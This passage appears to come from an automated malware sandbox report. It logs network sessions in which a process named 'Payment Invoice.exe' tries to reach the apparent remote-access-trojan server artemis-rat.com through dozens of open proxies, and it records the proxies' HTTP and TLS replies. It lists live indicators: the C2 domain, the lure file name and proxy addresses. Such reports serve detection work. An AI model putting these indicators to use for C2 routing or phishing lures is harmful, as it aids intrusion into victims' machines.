                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 68 7a 67 2f 68 7a 67 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>hzg/hzg</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                63192.168.2.450028104.27.15.161807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.392564058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.547149897 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                64192.168.2.45000237.187.77.58598707076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.393230915 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                65192.168.2.44997367.43.227.228263537076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.393299103 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:09.901757956 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                66192.168.2.450041162.159.242.138807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.402075052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.563044071 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                67192.168.2.44992765.109.152.8888887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.402838945 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.689642906 CET270INHTTP/1.1 503 Service Unavailable
                                                                Content-Type: text/plain; charset=utf-8
                                                                X-Content-Type-Options: nosniff
                                                                Date: Mon, 11 Mar 2024 15:15:24 GMT
                                                                Content-Length: 102
                                                                Data Raw: 64 69 61 6c 20 74 63 70 3a 20 6c 6f 6f 6b 75 70 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 6f 6e 20 31 2e 31 2e 31 2e 31 3a 35 33 3a 20 72 65 61 64 20 75 64 70 20 31 30 2e 36 34 2e 32 33 38 2e 32 31 36 3a 33 32 38 35 32 2d 3e 31 2e 31 2e 31 2e 31 3a 35 33 3a 20 69 2f 6f 20 74 69 6d 65 6f 75 74 0a
                                                                Data Ascii: dial tcp: lookup artemis-rat.com on 1.1.1.1:53: read udp 10.64.238.216:32852->1.1.1.1:53: i/o timeout


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                68192.168.2.44998567.43.236.18171457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.405716896 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.470837116 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                69192.168.2.449904123.30.154.17177777076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.409989119 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.781295061 CET343INHTTP/1.1 400 Bad Request
                                                                Server: nginx/1.10.3 (Ubuntu)
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 182
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                70192.168.2.450064104.20.56.71807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.425951958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.580843925 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                71192.168.2.450067172.67.53.215807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.428740978 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.583996058 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                72192.168.2.45017543.157.32.44437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.430819988 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                73192.168.2.45017843.157.32.44437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.434168100 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                74192.168.2.450054164.92.86.113573917076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.437767982 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.901676893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:15.417330980 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.505595922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.677336931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:20.792722940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.886655092 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                75192.168.2.4498695.44.42.115583867076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.440915108 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                76192.168.2.449953211.222.252.18781937076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.447390079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                77192.168.2.44993439.105.5.126807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.456680059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                78192.168.2.44999352.196.1.182807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.458991051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.754326105 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0
                                                                Mar 11, 2024 16:15:14.755295992 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ef 20 01 0d 91 aa 7c 10 49 8a 94 9b 99 9a 4a 35 36 69 af 5c 60 90 2b 3b 29 af c9 46 2a 70 1c 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                Data Ascii: e |IJ56i\`+;)F*p*,+0/$#('=<5/Uartemis-rat.com#
                                                                Mar 11, 2024 16:15:15.026465893 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 63 89 a7 b2 04 f4 9d d4 dc c3 94 9e 75 76 12 4d c9 f7 5a 5c 68 18 9c 05 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                Data Ascii: =9cuvMZ\hDOWNGRD0000*H010Uartemis-rat.com0240311151251Z260311151251Z010Uartemis-rat.com0"0*H0c XY
                                                                Mar 11, 2024 16:15:15.061804056 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 d3 02 89 14 e1 a3 01 e0 2c 24 5b a3 fe 79 89 25 9f b7 8c 41 22 de b5 4c 59 52 ae a4 b6 eb 23 76 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 67 92 82 a4 0b 23 86 22 07 42 88 35 1d ec 15 b3 50 dc e7 79 88
                                                                Data Ascii: %! ,$[y%A"LYR#v(g#"B5Py1qa
                                                                Mar 11, 2024 16:15:15.333684921 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 de 09 d2 3c 6d 93 d0 00 6c 35 0b 4d a8 b0 ff 86 51 a1 b3 3c 0c 6a 2b 61 4e 8b 57 9c 1e 2f cc 22 9f 2b 8c de 45 27 b7 40
                                                                Data Ascii: (<ml5MQ<j+aNW/"+E'@


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                79192.168.2.450042162.243.102.20797647076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.464760065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                80192.168.2.450100185.238.228.67807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.475559950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.629769087 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:14 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                81192.168.2.44998951.15.242.20288887076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.478868961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                82192.168.2.449992195.154.172.16131287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.482829094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:17:14.172511101 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                83192.168.2.450062137.184.200.4280007076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.494971991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.721405983 CET19INHTTP/1.0 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                84192.168.2.4499618.142.132.204180807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:14.497283936 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:14.839107990 CET767INHTTP/1.1 403 Forbidden
                                                                Server: Beaver
                                                                Cache-Control: no-cache
                                                                Content-Type: text/html
                                                                Content-Length: 635
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                85192.168.2.450016147.75.34.86100037076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
